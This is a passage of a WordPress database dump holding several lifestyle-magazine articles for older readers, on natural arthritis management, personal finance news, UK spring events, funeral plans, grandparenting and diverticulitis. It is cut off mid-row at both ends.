st_url=\"http://westonspirit.org.uk/2012/04/managing-arthritis-the-natural-way/\" displaytext=\"linkedin\"></span><span st_via=\"MyGetUpAndGo\" st_username=\"MyGetUpAndGo\" class=\"st_twitter_hcount\" st_title=\"Managing arthritis the natural way\" st_url=\"http://westonspirit.org.uk/2012/04/managing-arthritis-the-natural-way/\" displaytext=\"twitter\"></span><span class=\"st_facebook_hcount\" st_title=\"Managing arthritis the natural way\" st_url=\"http://westonspirit.org.uk/2012/04/managing-arthritis-the-natural-way/\" displaytext=\"facebook\"></span><span class=\"st_plusone_hcount\" st_title=\"Managing arthritis the natural way\" st_url=\"http://westonspirit.org.uk/2012/04/managing-arthritis-the-natural-way/\" displaytext=\"plusone\"></span>						</div>&#13;\n                	                	                		&#13;\n                	                	<h4>Arthritis can strike at any age, but a three-step plan of healthy eating, supplements and physical therapy could bring relief to this debilitating condition</h4>&#13;\n<p>For many, arthritis is a painful and debilitating condition that can affect various aspects and the quality of life. But it doesn’t have to be. The founder of The Arthritic Association, Charles de Coti-Marsh, spent 25 years developing a regime that manages the pain of arthritis in a natural, drug-free way.</p>&#13;\n<p>The most common form of arthritis is osteoarthritis (OA), known as the “wear and tear” disease, which affects mainly older age groups. Rheumatoid arthritis (RA) is an autoimmune condition that causes inflammation in the joint, leading to destruction of the joint itself. This can begin at any age, but usually starts in the thirties and forties.</p>&#13;\n<p>OA is a degenerative condition where the joints have been damaged through ageing or abnormal forces passing through them. In the past it was thought that these abnormal forces were due to an old injury, poor posture, overuse from activities such as sport, or from carrying excess weight.</p>&#13;\n<p><img class=\"aligncenter size-full wp-image-1850\" title=\"Couple Eating An Al Fresco Meal\" src=\"/wp-content/uploads/2012/04/Arthritic-Association.jpg\" alt=\"\" width=\"596\" height=\"398\" srcset=\"../../../wp-content/uploads/2012/04/Arthritic-Association.jpg 596w\" sizes=\"(max-width: 596px) 100vw, 596px\" />However, a growing number of medical researchers suspect there must be a reason why some people are more prone to having joints that suffer from a high degree of wear and tear while others don’t. One of the reasons could be genetic predisposition.</p>&#13;\n<p>Genes, found in every living cell, are the “blueprint” for life. Each living cell constantly replicates itself in a process known as mitosis. Energy, derived from food, is required for this process.</p>&#13;\n<p>Charles de Coti-Marsh believed that a healthy diet, rich in natural and unprocessed foods could minimise the ageing process by increasing the body’s energy levels so that cells are replicated more accurately during mitosis.</p>&#13;\n<p>He developed his own eating regime for those with arthritis, based on fresh fruit and vegetables, little or no red meat, but plenty of cheese and wholegrains. He asked his patients to avoid foods that tended to deplete energy stores, including refined foods and alcohol, although he agreed that a small glass of wine taken daily could be beneficial. He complemented this dietary regime with his own homeopathic preparations and food supplements and suggested that a course of physical therapy would benefit most patients.</p>&#13;\n<p>Throughout his life de Coti-Marsh was constantly researching into natural methods of managing arthritis and developing his treatment programme. In fact, he was so successful in helping arthritis sufferers he wanted the programme to be available for everyone and so founded The Arthritic Association in 1942.</p>&#13;\n<p>Today, the association carries on the work of de Coti-Marsh to benefit its members and all those who suffer with arthritis. It is a researchled charity, actively funding projects that increase the knowledge base about arthritis.</p>&#13;\n<p>Members are offered a three-part programme – a healthy eating regime, optional use of preparations and supplements, and physical therapy through a national network of professional physical therapists – to help manage their arthritic symptoms. A qualified nutritionist monitors the eating habits of every participating member and can offer advice and support to help minimise the effects of arthritis.</p>&#13;\n<p>Gold membership costs £6 annually with a one-off joining fee of £14, where you will receive the full package of benefits. Alternatively you can support the association by becoming a silver member at an annual subscription of £6.</p><div class=\"woo-sc-hr\"></div>&#13;\n<p><strong><em>0800 652 3188</em></strong></p>&#13;\n<p><strong><em><a title=\"www.arthriticassociation.org.uk\" href=\"http://www.arthriticassociation.org.uk/\" target=\"_blank\">www.arthriticassociation.org.uk</a></em></strong></p>&#13;\n									</div>','Managing arthritis the natural way','Arthritis can strike at any age, but a three-step plan of healthy eating, supplements and physical therapy could bring relief to this debilitating condition','publish','open','open','','managing-arthritis-the-natural-way','','','2018-04-02 20:06:43','2018-04-02 20:06:43','',0,'http://westonspirit.org.uk/managing-arthritis-the-natural-way.asp',0,'post','',0),(156,1,'2015-01-16 00:42:04','2015-01-16 00:42:04','<div class=\"entry\">&#13;\n                	<p class=\"post-meta\">&#13;\n    <span class=\"post-date\">29 April 2017</span>&#13;\n        <span class=\"sep\">•</span>&#13;\n    <span class=\"post-author\"><span class=\"small\">By</span> lwhitney\" title=\"Posts by Linda Whitney\" rel=\"author\"&gt;Linda Whitney</span>&#13;\n        </p>&#13;\n                							<div class=\"sharethis_top_bar\">&#13;\n                			<span class=\"st_email_hcount\" st_title=\"Money talks\" st_url=\"http://westonspirit.org.uk/2012/04/money-talks/\" displaytext=\"email\"></span><span class=\"st_linkedin_hcount\" st_title=\"Money talks\" st_url=\"http://westonspirit.org.uk/2012/04/money-talks/\" displaytext=\"linkedin\"></span><span st_via=\"MyGetUpAndGo\" st_username=\"MyGetUpAndGo\" class=\"st_twitter_hcount\" st_title=\"Money talks\" st_url=\"http://westonspirit.org.uk/2012/04/money-talks/\" displaytext=\"twitter\"></span><span class=\"st_facebook_hcount\" st_title=\"Money talks\" st_url=\"http://westonspirit.org.uk/2012/04/money-talks/\" displaytext=\"facebook\"></span><span class=\"st_plusone_hcount\" st_title=\"Money talks\" st_url=\"http://westonspirit.org.uk/2012/04/money-talks/\" displaytext=\"plusone\"></span>						</div>&#13;\n                	                	                	<h4>Our round-up of the latest news in finance</h4>&#13;\n<h3>All change</h3>&#13;\n<div id=\"attachment_1906\" style=\"width: 261px\" class=\"wp-caption alignright\"><img class=\" wp-image-1906  \" title=\"Save your small change: you may need it\" src=\"http://westonspirit.org.uk/wp-content/uploads/2012/04/SLOT-MACHINE.jpg\" alt=\"\" width=\"251\" height=\"375\" /><p class=\"wp-caption-text\">Save your small change: you may need it</p></div>&#13;\n<p>Fed up with trying coin after coin in slot machines and parking meters? New 5p and 10p coins come into circulation this year, but these are made of steel rather than cupronickel, as the current coins are. The steel coins are 0.2mm thicker so many coin slot machines may reject them. The new coins will not be common until the end of 2017, and the full change-over is expected to take up to ten years. Until then, be prepared with alternative coins – or carry a magnet to detect the steel ones.</p>&#13;\n<h3>Age irrelevant?</h3>&#13;\n<p>Products aimed at the over-50s don’t always offer better value. Research by Governor Money showed that the top 20 over-50s savings accounts offered an AER of 2.23 per cent in mid-April, compared with the top 20 accounts in the wider market which offered an average of 3.75 per cent. Of course, rates change all the time but the message is the same: “Treat such products with a high degree of caution and do not limit your options,” says Miles Bingham of Governor Money. Restricting your choice to over-50s accounts means you will be ignoring 93 per cent of the market.</p>&#13;\n<h3>Hidden assets</h3>&#13;\n<p>Track down your long-forgotten pensions at <a href=\"http://www.thepensionservice.gov.uk/\" target=\"_blank\">www.thepensionservice.gov.uk</a>. See also <a href=\"http://www.unclaimedassets.co.uk/\" target=\"_blank\">www.unclaimedassets.co.uk</a> to find out about those savings accounts you’ve overlooked. And check up on that neglected premium bond at <a href=\"http://www.nsadi.com/\" target=\"_blank\">www.nsadi.com</a>. Other “hidden” resources could include state benefits you may not realise you are entitled to. Check up on whether you’re eligible at <a href=\"http://www.direct.gov.uk/\" target=\"_blank\">www.direct.gov.uk</a></p>&#13;\n									</div>','Money talks','252','publish','open','open','','money-talks','','','2018-04-02 20:06:42','2018-04-02 20:06:42','',0,'http://westonspirit.org.uk/money-talks.asp',0,'post','',0),(157,1,'2015-07-17 06:19:22','2015-07-17 06:19:22','<div class=\"entry\">&#13;\n                	<p class=\"post-meta\">&#13;\n    <span class=\"post-date\">1 April 2017</span>&#13;\n        <span class=\"sep\">•</span>&#13;\n        </p>&#13;\n                							<div class=\"sharethis_top_bar\">&#13;\n                			<span class=\"st_email_hcount\" st_title=\"Out &amp; about\" st_url=\"http://westonspirit.org.uk/2012/04/out-about/\" displaytext=\"email\"></span><span class=\"st_linkedin_hcount\" st_title=\"Out &amp; about\" st_url=\"http://westonspirit.org.uk/2012/04/out-about/\" displaytext=\"linkedin\"></span><span st_via=\"MyGetUpAndGo\" st_username=\"MyGetUpAndGo\" class=\"st_twitter_hcount\" st_title=\"Out &amp; about\" st_url=\"http://westonspirit.org.uk/2012/04/out-about/\" displaytext=\"twitter\"></span><span class=\"st_facebook_hcount\" st_title=\"Out &amp; about\" st_url=\"http://westonspirit.org.uk/2012/04/out-about/\" displaytext=\"facebook\"></span><span class=\"st_plusone_hcount\" st_title=\"Out &amp; about\" st_url=\"http://westonspirit.org.uk/2012/04/out-about/\" displaytext=\"plusone\"></span>						</div>&#13;\n                	                	                	<h4>Our top tips will help you make the most of what’s going on around the country during the upcoming month</h4>&#13;\n<h3>By George!</h3>&#13;\n<p><strong>Celebrate England’s patron saint at the largest St George’s Day festival in the country at Wrest Park, Bedfordshire (21-22 April).</strong></p>&#13;\n<p>The entertainment spans the centuries, from medieval jousting knights and soldiers of the Great War to Victorian side-saddle demonstrations, falconry displays and an interactive play featuring England’s kings and queens.</p>&#13;\n<p>Peterkin the Fool will be on hand to amuse the crowds in his funny hat and the event will culminate in the ultimate heavyweight contest when St George takes on his fire-breathing foe once again.</p>&#13;\n<p>The official London St George’s Day celebration takes place in Trafalgar Square on Saturday 21 April. Festivities include free entertainment with live bands on the main stage, food stalls and street actors.</p>&#13;\n<p>William Shakespeare’s birthday also falls on St George’s Day and the Globe Theatre is hosting workshops and entertainment to bring the Bard back to life.</p>&#13;\n<p><img class=\"alignright size-full wp-image-1800\" title=\"St Georges Day 3 \" src=\"http://westonspirit.org.uk/wp-content/uploads/2012/04/St-Georges-Day-3-copy.jpg\" alt=\"\" width=\"596\" height=\"351\" />Many towns and cities hold their own St George’s Day events; in Nottingham, for example, the Royal Society of St George leads a parade of marching bands and uniformed revellers that starts at the site of the legendary Goose Fair and proceeds into the Old Market Square on the big day itself.</p>&#13;\n<p>Meanwhile, the Birmingham St George’s Day Association celebrates England and Englishness with a special concert at the city’s Symphony Hall on 21 April from 6pm. Guest star is actor and playwright Malcolm Stent.</p>&#13;\n<h3>Food for thought</h3>&#13;\n<p><strong>His name is Michael Caines and quite a few people know that he’s a top chef at the Gidleigh Park Country House Hotel on the edge of Dartmoor in Devon, where he has earned his reputation – as well as two Michelin stars and an MBE – over the past 13 years.</strong></p>&#13;\n<p></p><div id=\"attachment_1724\" class=\"wp-caption alignleft\" style=\"width: 250px\"><img class=\"wp-image-1724 \" title=\"Michael Caines\" src=\"/wp-content/uploads/2012/03/Michael-Caines-300x388.jpg\" alt=\"\" width=\"240\" height=\"310\" /><p class=\"wp-caption-text\">Michael Caines</p></div>&#13;\n<p>He’s also the cofounder of the Exeter Festival of South West Food and Drink which takes place in the cultural quarter of the city (13- 15 April).</p>&#13;\n<p>Caines will be demonstrating in the festival Cookery Theatre, assisted by his sous chef for the Friday, TV house-hunter and amateur cook Kirstie Allsopp.</p>&#13;\n<p>The foodie fiesta includes demonstrations from TV celebrity chefs, expert masterclasses and fine dining at the new Gourmet on the Go pop-up restaurants.</p>&#13;\n<p>At supper time, the Festival After Dark Party on Friday and Saturday nights presents two evenings of music plus a mouth-watering array of stalls serving regional fare, real ales and cider.</p>&#13;\n<h3>Crafty moves</h3>&#13;\n<p><img class=\"wp-image-1723 alignright\" style=\"border-style: initial; border-color: initial;\" title=\"Ferret\" src=\"http://westonspirit.org.uk/wp-content/uploads/2012/03/93878888-300x300.jpg\" alt=\"\" width=\"202\" height=\"202\" /></p>&#13;\n<p><strong>Kedleston Hall, the National Trust property set in rolling Derbyshire parkland near Quarndon, opens its gates for a country and craft fair (21-22 April).</strong></p>&#13;\n<p>The show’s main arena features championship scurry driving, falconry, working ferret and gun dog displays, target field sports and a pedigree dog show.</p>&#13;\n<p>Traditional craft demonstrations include glassblowing, blacksmiths’ and other rural skills, knitwear, walking sticks and – for the very steady-handed – chainsaw carving.</p>&#13;\n<h3>Blooming marvellous</h3>&#13;\n<p><strong>Botanical art bursts into bloom (20-29 April) when the Society of Botanical Artists holds its Annual London Open Exhibition at Westminster’s Central Hall.</strong></p>&#13;\n<p>The show will include some 700 works of flower and plant images in watercolours, pastel, pencil and oils. Admission is free and all work is for sale, including prints and cards.</p>&#13;\n									</div>','Out &amp; about','534','publish','open','open','','out-about','','','2018-04-02 20:06:40','2018-04-02 20:06:40','',0,'http://westonspirit.org.uk/out-about.asp',0,'post','',0),(158,1,'2015-08-19 06:53:13','2015-08-19 06:53:13','<div class=\"entry\">&#13;\n                	<p class=\"post-meta\">&#13;\n    <span class=\"post-date\">1 April 2017</span>&#13;\n        <span class=\"sep\">•</span>&#13;\n    <span class=\"post-author\"><span class=\"small\">By</span> lwhitney\" title=\"Posts by Linda Whitney\" rel=\"author\"&gt;Linda Whitney</span>&#13;\n        </p>&#13;\n                							<div class=\"sharethis_top_bar\">&#13;\n                			<span class=\"st_email_hcount\" st_title=\"Prepare for the known\" st_url=\"http://westonspirit.org.uk/2012/04/prepare-for-the-known/\" displaytext=\"email\"></span><span class=\"st_linkedin_hcount\" st_title=\"Prepare for the known\" st_url=\"http://westonspirit.org.uk/2012/04/prepare-for-the-known/\" displaytext=\"linkedin\"></span><span st_via=\"MyGetUpAndGo\" st_username=\"MyGetUpAndGo\" class=\"st_twitter_hcount\" st_title=\"Prepare for the known\" st_url=\"http://westonspirit.org.uk/2012/04/prepare-for-the-known/\" displaytext=\"twitter\"></span><span class=\"st_facebook_hcount\" st_title=\"Prepare for the known\" st_url=\"http://westonspirit.org.uk/2012/04/prepare-for-the-known/\" displaytext=\"facebook\"></span><span class=\"st_plusone_hcount\" st_title=\"Prepare for the known\" st_url=\"http://westonspirit.org.uk/2012/04/prepare-for-the-known/\" displaytext=\"plusone\"></span>						</div>&#13;\n                	                	                	<h4>It happens to us all eventually and even death comes with a big bill these days. But there are ways to cover it – and ways to choose the funeral you want, where you want</h4>&#13;\n<p>The average funeral now costs just under £3,100, up 61 per cent in less than eight years, according to the 2016 annual Cost of Dying report from Sun Life Direct.</p>&#13;\n<p>“By entrusting their end-of-life plans to their families, the state or no-one at all, many people are leaving their loved ones a very tricky financial situation particularly when you consider that nearly one in five people struggle with funeral costs,” says Simon Cox, head of life planning at Sun Life Direct.</p>&#13;\n<p>But there are ways to plan for funeral expenses. You can simply save for your funeral, ideally using a tax-free product such as a cash ISA, or you can buy a pre-paid funeral plan. These cost £2,000-£4,000 and safeguard you from future rises.</p>&#13;\n<p>“It means you are buying your funeral at today’s prices,” says Stuart Harland of the Funeral Planning Authority (FPA), the industry’s professional body.</p>&#13;\n<p><img class=\"alignright size-full wp-image-1783\" title=\"Funeral1\" src=\"http://westonspirit.org.uk/wp-content/uploads/2012/03/Funeral1-e1333123724965.jpg\" alt=\"\" width=\"593\" height=\"394\" />Funeral plans are sold by funeral directors and organisations such as The Co-operative Funeral Care, Golden Charter and Age UK. The FPA oversees registered providers to ensure that the money paid by customers is safeguarded so that the funeral is provided in accordance with the plan bought.</p>&#13;\n<p>If you do go for this option, check exactly what is covered. Some plans cover only funeral directors’ costs, such as staff or vehicles. Others cover disbursements – the fees paid by the funeral director for items such as flowers.</p>&#13;\n<p>For example, Golden Charter’s £1,995 Easier Way Funeral Plan covers funeral directors’ services only, but its £3,390 Symphony Plan also includes some disbursements.</p>&#13;\n<p>“If the funeral plan does not cover disbursements, the family can find that the total bill amounts to more than the funeral plan covers,” warns Harland.</p><div class=\"woo-sc-quote\"><p>Some plans cover only funeral directors’ costs such as staff or vehicles… others items such as flowers</p></div>&#13;\n<p>Ask if you have to pay the total upfront or in instalments, and if instalments attract interest. Golden Charter, for instance, allows interest-free instalments up to 12 months, but charges interest for payments over longer periods. Some plans are tied to particular chains or directors, for example, the Sun Life Guaranteed Over-50 Plan. This guarantees the sum you receive, but does not include any funeral arrangements. Sun Life’s Simple Choice Funerals plan, however, was created in partnership with The Co-operative Funeral Care, and pays the proceeds direct to the funeral director.</p>&#13;\n<p>With insurance plans, those who pay in for many years could find their premiums total more than the sum paid out. In some cases premiums must be paid until death, but in others premiums stop when you reach a certain age. Ask what happens if you die in the early years of the policy, too – usually your payout is reduced.</p>&#13;\n<p>Whatever you choose, give your family full details about the plan, so they know who to contact when the time comes.</p><div class=\"woo-sc-hr\"></div>&#13;\n<p><em>For more advice, see the funeral plans section on the government’s Money Advice Service website</em></p>&#13;\n									</div>','Prepare for the known','503','publish','open','open','','prepare-for-the-known','','','2018-04-02 20:06:38','2018-04-02 20:06:38','',0,'http://westonspirit.org.uk/prepare-for-the-known.asp',0,'post','',0),(159,1,'2017-04-19 06:52:55','2017-04-19 06:52:55','<div class=\"entry\">&#13;\n                	<p class=\"post-meta\">&#13;\n    <span class=\"post-date\">29 April 2017</span>&#13;\n        </p>&#13;\n                							<div class=\"sharethis_top_bar\">&#13;\n                			<span class=\"st_email_hcount\" st_title=\"Retirement with added social life\" st_url=\"http://westonspirit.org.uk/2012/04/retirement-with-added-social-life/\" displaytext=\"email\"></span><span class=\"st_linkedin_hcount\" st_title=\"Retirement with added social life\" st_url=\"http://westonspirit.org.uk/2012/04/retirement-with-added-social-life/\" displaytext=\"linkedin\"></span><span st_via=\"MyGetUpAndGo\" st_username=\"MyGetUpAndGo\" class=\"st_twitter_hcount\" st_title=\"Retirement with added social life\" st_url=\"http://westonspirit.org.uk/2012/04/retirement-with-added-social-life/\" displaytext=\"twitter\"></span><span class=\"st_facebook_hcount\" st_title=\"Retirement with added social life\" st_url=\"http://westonspirit.org.uk/2012/04/retirement-with-added-social-life/\" displaytext=\"facebook\"></span><span class=\"st_plusone_hcount\" st_title=\"Retirement with added social life\" st_url=\"http://westonspirit.org.uk/2012/04/retirement-with-added-social-life/\" displaytext=\"plusone\"></span>						</div>&#13;\n                	                	                		&#13;\n                	                										</div>','Retirement with added social life','','publish','open','open','','retirement-with-added-social-life','','','2018-04-02 20:06:36','2018-04-02 20:06:36','',0,'http://westonspirit.org.uk/retirement-with-added-social-life.asp',0,'post','',0),(160,1,'2014-12-06 09:05:36','2014-12-06 09:05:36','<div class=\"entry\">&#13;\n                	<p class=\"post-meta\">&#13;\n    <span class=\"post-date\">1 April 2017</span>&#13;\n        <span class=\"sep\">•</span>&#13;\n    <span class=\"post-author\"><span class=\"small\">By</span> hdavies\" title=\"Posts by Hunter Davies\" rel=\"author\"&gt;Hunter Davies</span>&#13;\n        </p>&#13;\n                							<div class=\"sharethis_top_bar\">&#13;\n                			<span class=\"st_email_hcount\" st_title=\"Senior moment\" st_url=\"http://westonspirit.org.uk/2012/04/senior-moment-2/\" displaytext=\"email\"></span><span class=\"st_linkedin_hcount\" st_title=\"Senior moment\" st_url=\"http://westonspirit.org.uk/2012/04/senior-moment-2/\" displaytext=\"linkedin\"></span><span st_via=\"MyGetUpAndGo\" st_username=\"MyGetUpAndGo\" class=\"st_twitter_hcount\" st_title=\"Senior moment\" st_url=\"http://westonspirit.org.uk/2012/04/senior-moment-2/\" displaytext=\"twitter\"></span><span class=\"st_facebook_hcount\" st_title=\"Senior moment\" st_url=\"http://westonspirit.org.uk/2012/04/senior-moment-2/\" displaytext=\"facebook\"></span><span class=\"st_plusone_hcount\" st_title=\"Senior moment\" st_url=\"http://westonspirit.org.uk/2012/04/senior-moment-2/\" displaytext=\"plusone\"></span>						</div>&#13;\n                	                	                	<p>I have four grandchildren – two bigs and two smalls. The olders are Amelia and Ruby, aged 12, while the youngers are Amarisse, four, and Sienna, three.</p>&#13;\n<p>God, I hope I have got their ages right or I will be for it. My wife knows the age and birthday of every member of the Royal Family, the names of most wives of Premiership players and, of course, the telephone numbers of every member of our own family.</p>&#13;\n<p>I have trouble remembering my own. Actually, I do know Amarisse’s birthday as it is 7 January. Same as mine. Same every year, which is ever so helpful.</p>&#13;\n<p>Though I did, in fact, change my birthday to 7 August for about 20 years. Early January is such a boring dreary time of the year, too near Christmas to ever get a decent present. My mother was not at all amused. It was good enough for her, blah blah.</p>&#13;\n<p></p><div id=\"attachment_1814\" class=\"wp-caption alignright\" style=\"width: 603px\"><img class=\"size-full wp-image-1814\" title=\"Hunter Davies\" src=\"/wp-content/uploads/2012/03/Hunter-Davies-e1333128860989.jpg\" alt=\"\" width=\"593\" height=\"362\" /><p class=\"wp-caption-text\">Hunter Davies</p></div>&#13;\n<p>The younger ones have just gone, so I must go for a lie down. They are so exhausting at that age. It was my own fault, agreeing to play shops. For this I have to dress up each time in old clothes and come to their shop with a basket, put on a funny voice, and pretend to buy stuff. They have hysterics, thinking it’s incredibly funny, which it is, quite, the first two or three times. By the 20th time I am knackered.</p><div class=\"woo-sc-quote\"><p>My older two grandchildren are still willing to do boring jobs for a few measly coins. Like a bit of weeding, pouring out my Beaujolais…</p></div>&#13;\n<p>Then we did hide and seek, for which they never close their eyes, not quite having got the hang of it, though they are excellent at counting – 1, 2, 7, 4, 8, 15, 1,000, coming ready or not, Humpa. That’s my nickname, a combination of Hunter and Grandpa. The grandchildren’s own invention.</p>&#13;\n<p><img class=\"alignright  wp-image-1815\" title=\"skd182904sdc\" src=\"/wp-content/uploads/2012/03/skd182904sdc-copy.jpg\" alt=\"\" width=\"358\" height=\"532\" />My own children never called me by a nickname, just my normal name. I did hope for Sir or Pater, but no luck. Their mother was and is always known as Mum but I was and am always Hunter. What does that show? Lack of respect – or being treated as just another child?</p>&#13;\n<p>My older two grandchildren have got to the stage and age of being enormously useful – and still willing to do boring jobs for a few measly coins. Like a bit of weeding, pouring out my Beaujolais, carrying the logs up to my fire, though I draw the line at sending them up the chimney. Like what I had to do. So I tell them. You can tell grandchildren any old thing.</p>&#13;\n<p>“Tell me about the Sixties, Grandpa,” they will say, when they have a school project. I say: “Sixties? They’re not over, are they?”</p>&#13;\n<p>But of course the best thing about the older ones is that they are technological wizards. They often arrive with a truck to carry all their personal smartphones, laptops, iPads. It does mean they are able to work my digital camera, transfer photos to my computer and show me how to use my mobile phone. I do have one, which I often answer – that does surprise callers – but I need help with texts and as for accessing a voice message, if someone is stupid enough to leave one, I have no idea how to get it out.</p>&#13;\n<p>Grandchildren, I can recommend them. They do have their uses.</p>&#13;\n									</div>','Senior moment','565','publish','open','open','','senior-moment-2','','','2018-04-02 20:06:35','2018-04-02 20:06:35','',0,'http://westonspirit.org.uk/senior-moment-2.asp',0,'post','',0),(161,1,'2015-03-02 20:52:42','2015-03-02 20:52:42','<div class=\"entry\">&#13;\n                	<p class=\"post-meta\">&#13;\n    <span class=\"post-date\">29 April 2017</span>&#13;\n        <span class=\"sep\">•</span>&#13;\n    <span class=\"post-author\"><span class=\"small\">By</span> dwain\" title=\"Posts by Deborah Wain\" rel=\"author\"&gt;Deborah Wain</span>&#13;\n        </p>&#13;\n                							<div class=\"sharethis_top_bar\">&#13;\n                			<span class=\"st_email_hcount\" st_title=\"Spotting the signs\" st_url=\"http://westonspirit.org.uk/2012/04/spotting-the-signs/\" displaytext=\"email\"></span><span class=\"st_linkedin_hcount\" st_title=\"Spotting the signs\" st_url=\"http://westonspirit.org.uk/2012/04/spotting-the-signs/\" displaytext=\"linkedin\"></span><span st_via=\"MyGetUpAndGo\" st_username=\"MyGetUpAndGo\" class=\"st_twitter_hcount\" st_title=\"Spotting the signs\" st_url=\"http://westonspirit.org.uk/2012/04/spotting-the-signs/\" displaytext=\"twitter\"></span><span class=\"st_facebook_hcount\" st_title=\"Spotting the signs\" st_url=\"http://westonspirit.org.uk/2012/04/spotting-the-signs/\" displaytext=\"facebook\"></span><span class=\"st_plusone_hcount\" st_title=\"Spotting the signs\" st_url=\"http://westonspirit.org.uk/2012/04/spotting-the-signs/\" displaytext=\"plusone\"></span>						</div>&#13;\n                	                	                	<h4>It’s an age-related digestive condition not everyone has heard of, but we all need to watch for the symptoms of potentially life-threatening diverticulitis</h4>&#13;\n<p>In a bid to shake off a nagging pain in her stomach, Margaret Glanville headed to her usual exercise classes at the gym.</p>&#13;\n<p>A few hours later, she was in agony, running a fever and being told by doctors that she had peritonitis – a life-threatening inflammation of the membrane which lines the wall of the abdomen.</p>&#13;\n<p>The root cause of her illness was diverticulitis, a condition in which diverticula – bubble-like pouches – develop on the wall of the colon and then become irritated or infected.</p>&#13;\n<p>More than half of over-50s develop diverticula but most experience no discomfort. Some people – around one in four – develop diverticular disease with symptoms including abdominal pain and diarrhoea.</p>&#13;\n<p><img class=\"aligncenter size-full wp-image-1868\" title=\"94717488\" src=\"/wp-content/uploads/2012/04/94717488-e1335542053578.jpg\" alt=\"\" width=\"593\" height=\"408\" />The more serious diverticulitis is diagnosed when a pouch becomes inflamed and the patient has symptoms such as severe pain, nausea and/ or bleeding from the back passage.</p>&#13;\n<p>Glanville’s case was especially severe in that an abscess had formed on one of the diverticula and then burst, causing peritonitis. She was treated with intravenous antibiotics and underwent keyhole surgery which enabled the poison to be drained away. Surgeons managed to repair the affected diverticula by stitching it, although if she has repeated bouts of diverticulitis, she may face surgery to remove the affected section of her colon.</p>&#13;\n<p>Glanville, 69, a retired hospital ward clerk from Shrewsbury, now carries antibiotic tablets when she travels to stop a flare-up in its tracks.</p>&#13;\n<p>She says: “I suffer from irritable bowel syndrome, as well as diverticular disease, but feel I can now recognise diverticulitis. I’ve had it again, which wasn’t as bad, but I know how quickly it can become serious and that’s frightening.”</p>&#13;\n<p>To determine whether a patient has problems with diverticula, doctors usually carry out a CT colonography using a CT scanner to produce 3D images of the colon.</p>&#13;\n<p>Lack of fibre is thought to be a key cause of diverticula developing in the first place. However, Geoff Hutchinson, a consultant surgeon and gastroenterologist at Spire Cheshire Hospital, Warrington, believes the pouches are more likely to be due to the natural ageing process in the bowel. Many of his patients find fibre can make problems worse and they learn what diet suits them through simple trial and error, he says.</p>&#13;\n<p>“Much more research is needed into diverticular disease and diverticulitis. As the older population increases, this is potentially a massive problem but no one wants to take ownership of it.”</p>&#13;\n<p>If you do have the condition, a healthy lifestyle and probiotics should help, he advises. And if you suspect you have it, warns Hutchinson, “don’t self-diagnose. Visit your GP as bowel cancer can cause similar symptoms”.</p>&#13;\n<p>The sooner diverticulitis is treated with antibiotics, the lower the risk of complications developing.</p><div class=\"woo-sc-hr\"></div>&#13;\n<p><em>For more information, visit <strong><a href=\"http://www.nhs.uk/conditions/Diverticular-disease-anddiverticulitis/Pages/Introduction.aspx\" target=\"_blank\">www.nhs.uk/conditions/Diverticular-disease-anddiverticulitis/Pages/Introduction.aspx</a></strong></em></p>&#13;\n<div class=\"woo-sc-box normal   \">&#13;\n<h3>Healthy matters</h3>&#13;\n<p><strong>Our round-up of the latest news on health</strong></p>&#13;\n<h3>End to embarrassment</h3>&#13;\n<p>Bladder weakness is a problem for around a third of women, the Bladder and Bowel Foundation says. One treatment involves injecting a gel into the urethra, creating a bulking effect. It helps prevent leakage and stays in place for up to four years.</p>&#13;\n<p>Urologist Steve Foley has carried out the procedure for several years at Reading’s Royal Berkshire Hospital. It is available both on the NHS and privately across the UK.</p>&#13;\n<p>Visit <strong><a href=\"http://www.defluxsui.com/\" target=\"_blank\">www.defluxsui.com</a></strong></p>&#13;\n<div class=\"woo-sc-hr\"></div>&#13;\n<h3>Bouncing back</h3>&#13;\n<p>Osteopath Adam Dallison, based in Surrey, has designed an x-shaped sticking plaster to help relieve back pain and help correct posture.</p>&#13;\n<p>Struts fitted into PosturePlast aim to give wearers flexibility but prevent them from bending or twisting into positions that can damage their back.</p>&#13;\n<p><img class=\"aligncenter size-full wp-image-1867\" title=\"91782943\" src=\"/wp-content/uploads/2012/04/91782943-e1335542011803.jpg\" alt=\"\" width=\"575\" height=\"320\" />In NHS trials, 78 per cent of users reported less pain after using the product for a week.</p>&#13;\n<p>A £14.40 pack of four is available at <strong><a href=\"http://www.postureplast.co.uk/\" target=\"_blank\">www.postureplast.co.uk</a></strong></p>&#13;\n<div class=\"woo-sc-hr\"></div>&#13;\n<h3>Support for diabetics</h3>&#13;\n<p>A network is being set up to help improve services for older people with diabetes in England.</p>&#13;\n<p>NHS Diabetes, working with the Institute of Diabetes for Older People, aims to bring together health and social care professionals, as well as patients, carers, and support groups into regional groups.</p>&#13;\n<p>Older people are more likely to have diabetes, with as many as one in four people in residential and nursing care suffering from the condition.</p>&#13;\n<p>Visit <strong><a href=\"http://www.diabetes.nhs.uk/networks/older_people_network\" target=\"_blank\">www.diabetes.nhs.uk/networks/older_people_network</a></strong></p>&#13;\n</div>&#13;\n									</div>','Spotting the signs','721','publish','open','open','','spotting-the-signs','','','2018-04-02 20:06:33','2018-04-02 20:06:33','',0,'http://westonspirit.org.uk/spotting-the-signs.asp',0,'post','',0),(162,1,'2015-04-16 13:10:26','2015-04-16 13:10:26','<div class=\"entry\">&#13;\n                	<p class=\"post-meta\">&#13;\n    <span class=\"post-date\">29 April 2017</span>&#13;\n        <span class=\"sep\">•</span>&#13;\n    <span class=\"post-author\"><span class=\"small\">By</span> gnorwood\" title=\"Posts by Graham Norwood\" rel=\"author\"&gt;Graham Norwood</span>&#13;\n        </p>&#13;\n                							<div class=\"sharethis_top_bar\">&#13;\n                			<span class=\"st_email_buttons\" st_title=\"Sunshine state beckons\" st_url=\"http://westonspirit.org.uk/2012/04/sunshine-state-beckons/\" displaytext=\"share\"></span><span class=\"st_linkedin_buttons\" st_title=\"Sunshine state beckons\" st_url=\"http://westonspirit.org.uk/2012/04/sunshine-state-beckons/\" displaytext=\"share\"></span><span class=\"st_twitter_buttons\" st_title=\"Sunshine state beckons\" st_url=\"http://westonspirit.org.uk/2012/04/sunshine-state-beckons/\" displaytext=\"share\"></span><span class=\"st_facebook_buttons\" st_title=\"Sunshine state beckons\" st_url=\"http://westonspirit.org.uk/2012/04/sunshine-state-beckons/\" displaytext=\"share\"></span><span class=\"st_plusone_buttons\" st_title=\"Sunshine state beckons\" st_url=\"http://westonspirit.org.uk/2012/04/sunshine-state-beckons/\" displaytext=\"share\"></span>						</div>&#13;\n                	                	                	<h4>Florida is one of the hottest retirement destinations around – and not just because of the year-round high 